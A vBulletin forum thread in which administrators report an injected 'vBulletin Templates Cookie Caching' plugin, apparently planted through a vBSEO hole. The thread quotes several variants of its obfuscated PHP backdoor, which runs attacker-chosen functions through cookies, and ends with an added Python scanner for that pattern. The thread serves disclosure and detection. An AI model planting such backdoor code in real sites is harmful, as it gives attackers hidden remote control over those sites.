Is This a Default Plugin?
However you should change all your passwords... Email, FTP, Admin CP, vBSEO, etc... Especially if you shared passwords among accounts or used any password shorter than 12 characters.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 API
-
I can't see the plugin id of added plugins, so I can't know if it was added by any of the admin users. It should also be noted that the latest vBSEO patch does not help against this as 3.6.0 has had that patch all the time already (see: https://www.vbulletin.com/forum/show...=1#post2257525).
I'd say we're all working to make the software as secure as possible. Eliminating any potential vector achieves that.
Wayne Luke
-
vBSEO's release announcement is incorrect then, because I've had another plugin added to the same spot even after making their update.
I just made a post about it on their forums, which I've quoted below for convenience.
Not sure if it might be related to this issue or not, but when I went and did a file diagnostics on my forum, it found that the file md5_sums_crawlability_vbseo.php was missing. Seeing as I installed vBSEO for the first time with the current version, I find it unlikely I would've missed uploading it when I installed the package.
EDIT:
It looks like the plugin is back and worse than before. Just went into my plugin manager to check, and found this under global_complete.
vBulletin Templates Cookie Caching
Code:
/* vBulletin Templates Cookie Caching */ $vbr="ofkqjhri";$vbh="158b2179e61097612d74754bbc1e8c7a";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
Okay, just went to my admin log and checked. The plugin being added is clearly shown there, however it's being shown as added by me and with the IP I am currently using.
Here's the kicker though. At pretty much the exact time this plugin was added, I'd made the vBSEO config file writable so that I could change some settings. The timing seems too much to be a coincidence.
-
If they've done something else after already gaining access, they could be sneaking the plugin back in in a large number of ways.
-
Okay I have this plugin that I didn't install:
vBulletin Templates Cookie Caching
here is the code:
Code:
/* vBulletin Templates Cookie Caching */ $vbr="hgfzshne";$vbh="49cfac7025dfd5d00dc5a080c4a5c637";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
-
Delete the plugin. Make sure you don't even visit your vBSEO control panel until vBSEO come out with a fix. Report back if any rogue plugins appear again despite you not visiting that control panel.
-
Confirmed another name for it
Code:
/* vBulletin Dynamic Menu Filters */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
The opinions expressed in forum posts are my own personal opinions and do not represent any companies that I am associated with.
-
Same location as the previous ones?
-
Yes, same location. I've checked 21 client sites so far; 2 of them have been affected, and also a test site that was only set up last week has been affected. So far I've found nothing else apart from the plugin, but I am disabling vBSEO as a precaution.
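Added example, not code from any poster in this thread or from vBulletin/vBSEO: a Python check for the shape shared by the rogue plugin bodies quoted above, where a cookie value is split by `preg_match` and one capture is then called as a function. It assumes plugin rows have been exported as dicts with `title`, `hook` and `code` keys (hypothetical field names); the second sample row is constructed.

```python
import re

# preg_match(<pattern>, $_COOKIE[...], $var): cookie text split into captures.
COOKIE_CAPTURE = re.compile(
    r"preg_match\s*\(.*?\$_COOKIE\s*\[[^\]]+\]\s*,\s*\$(\w+)\s*\)", re.S)
# $var[i]($var[j]): one capture used as a function name, another as its argument.
CAPTURE_CALL = re.compile(
    r"\$(\w+)\s*\[\s*\d+\s*\]\s*\(\s*\$(\w+)\s*\[\s*\d+\s*\]\s*\)")
COOKIE_NAME = re.compile(r"""\$_COOKIE\s*\[\s*["']([^"']+)["']\s*\]""")


def inspect_plugin(code):
    """Return a finding dict if cookie captures reach a variable function call."""
    tainted = set(COOKIE_CAPTURE.findall(code))
    for fn_var, _arg_var in CAPTURE_CALL.findall(code):
        if fn_var in tainted:
            return {"capture_var": fn_var,
                    "cookies": sorted(set(COOKIE_NAME.findall(code)))}
    return None


def scan(plugins):
    """plugins: iterable of dicts with 'title', 'hook', 'code' (assumed export shape)."""
    findings = []
    for p in plugins:
        hit = inspect_plugin(p["code"])
        if hit:
            findings.append({"title": p["title"], "hook": p["hook"], **hit})
    return findings


# Sample rows: the first body is the "Dynamic Menu Filters" code quoted in the
# thread; the second is a constructed benign plugin that also reads a cookie.
SAMPLE = [
    {"title": "vBulletin Dynamic Menu Filters", "hook": "global_complete",
     "code": r'''(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);'''},
    {"title": "Remember style choice (constructed)", "hook": "global_start",
     "code": r'''if (isset($_COOKIE["style"]) && preg_match("/^(\d+)$/", $_COOKIE["style"], $m)) { $styleid = intval($m[1]); }'''},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit means the plugin body needs manual review. The check is a heuristic and will not flag variants that pass the cookie value through an intermediate variable or rename the plugin's structure.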